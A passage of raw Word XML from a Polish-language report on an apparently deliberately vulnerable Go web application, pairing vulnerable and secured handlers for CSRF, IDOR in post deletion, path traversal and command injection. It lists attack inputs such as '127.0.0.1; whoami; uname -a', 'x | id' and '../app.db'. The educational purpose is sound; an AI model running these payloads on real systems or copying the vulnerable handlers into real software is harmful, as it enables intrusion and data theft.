              </w:rPr>
              <w:t>&amp;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>stored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==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ErrNoRows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false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false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bcrypt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CompareHashAndPassword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7C3AED"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>byte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stored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7C3AED"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>byte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;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false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06" w:name="lst6"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 6. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2006"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="6" w:name="sec6"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2.4. CSRF w ustawieniach profilu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Funkcjonalność aplikacji:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>GET/POST /ui/profile</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>GET/POST /ui/csrf-secure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>GET/POST /csrf-vulnerable-form</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pliki źródłowe:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/handlers/handlers.go:1002</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/handlers/handlers.go:1124</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/handlers/handlers.go:1051</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wejścia:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>new_email</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> z formularza profilu, ciasteczko sesji, w secure dodatkowo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>csrf_token</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> w formularzu i cookie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>bai_csrf_token</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wyjścia:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Zmieniony adres email użytkownika albo HTTP 403 z komunikatem </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>CSRF token validation failed</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Co dzieje się wewnątrz:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> W podatnym POST serwer ufa temu, że przeglądarka wysłała ciasteczko sesyjne, i od razu aktualizuje email. To pozwala obcej stronie wysłać ukryty formularz w imieniu zalogowanego użytkownika. W secure GET generuje losowy token, zapisuje go w cookie i formularzu, a POST porównuje obie wartości przed zmianą danych.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kod podatny: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CsrfFormVulnerable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loggedIn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currentUsername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newEmail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PostForm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"new_email"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loggedIn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Redirect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StatusSeeOther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"/ui/login?err=1&amp;msg=Please+log+in"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64748B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>// VULNERABLE: no CSRF token check before the state-changing update.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UpdateUserEmail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newEmail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;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renderHTML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StatusInternalServerError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"csrf_demo"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views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CSRFDemoPage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loggedIn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newEmail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"Failed"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renderHTML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StatusOK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"csrf_demo"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views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CSRFDemoPage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loggedIn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newEmail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"Email updated"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false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07" w:name="lst7"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 7. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2007"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kod zabezpieczony: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CsrfSecureForm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loggedIn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currentUsername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formToken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PostForm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"csrf_token"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cookieToken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cookieErr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Cookie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csrfCookieName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cookieErr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||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formToken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==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||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formToken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cookieToken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token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generateCSRFToken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setCSRFCookie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token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renderHTML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StatusForbidden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"csrf_secure"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views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CSRFDemoPage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loggedIn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token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"CSRF token validation failed"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newEmail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PostForm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"new_email"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UpdateUserEmail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newEmail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;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renderHTML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StatusInternalServerError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"csrf_secure"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views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CSRFDemoPage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loggedIn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formToken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newEmail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"Failed"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08" w:name="lst8"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 8. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2008"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="7" w:name="sec7"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2.5. Broken Access Control / IDOR w moderacji postów</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Funkcjonalność aplikacji:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>DELETE /posts/:id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>POST /ui/posts/delete/:id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, widok </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/ui/moderation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pliki źródłowe:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/handlers/handlers.go:286</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/handlers/handlers.go:488</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/handlers/handlers.go:582</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wejścia:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> posta z URL oraz ciasteczko sesji; atak polega na zmianie ID na post innego autora.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wyjścia:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP 200 i usunięty rekord albo HTTP 403 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>You can only delete your own posts</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Co dzieje się wewnątrz:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> W insecure mode po zalogowaniu nie ma kontroli właściciela - kod przechodzi bezpośrednio do </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>DeletePost</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. W secure mode handler pobiera bieżącego użytkownika, sprawdza rolę admina i autora wpisu przez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>canDeletePost</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; dopiero pozytywny wynik pozwala wykonać </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>DELETE</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kod podatny: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PostDelete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requireLoginJSON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id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strconv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Atoi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Param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"id"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JSON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StatusBadRequest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rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"error"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"Invalid post id"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64748B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>// VULNERABLE when SECURITY_ENABLED=false: no ownership check is executed.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DeletePost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id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;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JSON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StatusInternalServerError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rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"error"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"Failed to delete post"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JSON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StatusOK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rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"message"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"Post deleted"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09" w:name="lst9"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 9. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2009"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kod zabezpieczony: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ok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currentUsername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ok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JSON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StatusUnauthorized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rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"error"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"Login required"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allowed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canDeletePost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id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JSON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StatusInternalServerError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rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"error"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"Authorization check failed"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allowed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JSON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StatusForbidden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rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"error"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"You can only delete your own posts"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DeletePost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id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;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JSON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StatusInternalServerError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rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"error"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"Failed to delete post"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10" w:name="lst10"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 10. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2010"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="8" w:name="sec8"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2.6. Path Traversal / LFI w podglądzie plików fanartów</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Funkcjonalność aplikacji:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>GET /ui/gallery?name=...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>GET /api/files-vulnerable?name=...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>GET /api/files-secure?name=...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pliki źródłowe:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/handlers/handlers.go:1287</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/handlers/handlers.go:1313</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/handlers/handlers.go:1342</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wejścia:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - nazwa pliku w katalogu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>uploads</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; poprawnie: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sample.txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; atak: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>../internal/db/db.go</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>../app.db</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wyjścia:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Treść pliku tekstowego albo HTTP 400/404. Podatny wariant może zwrócić kod źródłowy lub bazę SQLite, secure blokuje ścieżkę wychodzącą poza </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>uploads</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Co dzieje się wewnątrz:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> W podatnym kodzie ścieżka powstaje przez zwykłe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>uploadsDir + "/" + name</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, więc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>../</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> jest interpretowane przez system plików. Secure odrzuca ścieżki absolutne, normalizuje nazwę przez </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>filepath.Clean</w:t>
      </w:r>
      <w:r>
        <w:t>, buduje ścieżkę absolutną i sprawdza, czy nadal zaczyna się od absolutnego katalogu uploadów.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kod podatny: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FilesVulnerable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"name"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==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JSON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StatusBadRequest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rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"error"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"name parameter required"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64748B"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>// VULNERABLE: ../ sequences are accepted by the filesystem.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path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uploadsDir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"/"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name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data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os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ReadFile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path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JSON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StatusNotFound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rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="B91C1C"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>"error"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"file not found"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"path"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path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StatusOK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data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11" w:name="lst11"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 11. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2011"/>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kod zabezpieczony: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safeUploadPath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filepath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IsAbs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false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cleaned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filepath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Clean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name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cleaned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==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"."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||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cleaned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==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".."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||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strings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HasPrefix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cleaned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".."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filepath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Separator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false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base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filepath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Abs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uploadsDir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false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candidate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filepath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Join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base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cleaned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!</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="111827"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>strings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HasPrefix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candidate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base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filepath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Separator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&amp;&amp;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candidate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base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false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candidate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true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12" w:name="lst12"/>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:spacing w:before="60" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="475569"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Listing 12. Fragment implementacji aplikacji (go). Źródło: fragment kodu źródłowego projektu.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2012"/>
    </w:p>
    <w:p>
      <w:bookmarkStart w:id="9" w:name="sec9"/>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>2.7. Command Injection w narzędziu sprawdzania hosta streamu</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Funkcjonalność aplikacji:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>GET /ui/stream-check?host=...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>GET /api/ping-vulnerable?host=...</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>GET /api/ping-secure?host=...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Pliki źródłowe:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/handlers/handlers.go:1451</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/handlers/handlers.go:1472</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>internal/handlers/handlers.go:1422</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wejścia:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>host</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - nazwa hosta lub IP; poprawnie: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; atak: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>127.0.0.1; whoami; uname -a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> albo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>x | id</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Wyjścia:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Tekstowy wynik </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ping</w:t>
      </w:r>
      <w:r>
        <w:t>; w podatnym wariancie wynik może zawierać wyjście dodatkowych komend, w secure metaznaki kończą się HTTP 400.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Co dzieje się wewnątrz:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Podatny handler buduje komendę tekstowo i uruchamia </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sh -c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, więc średnik, potok albo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>&amp;&amp;</w:t>
      </w:r>
      <w:r>
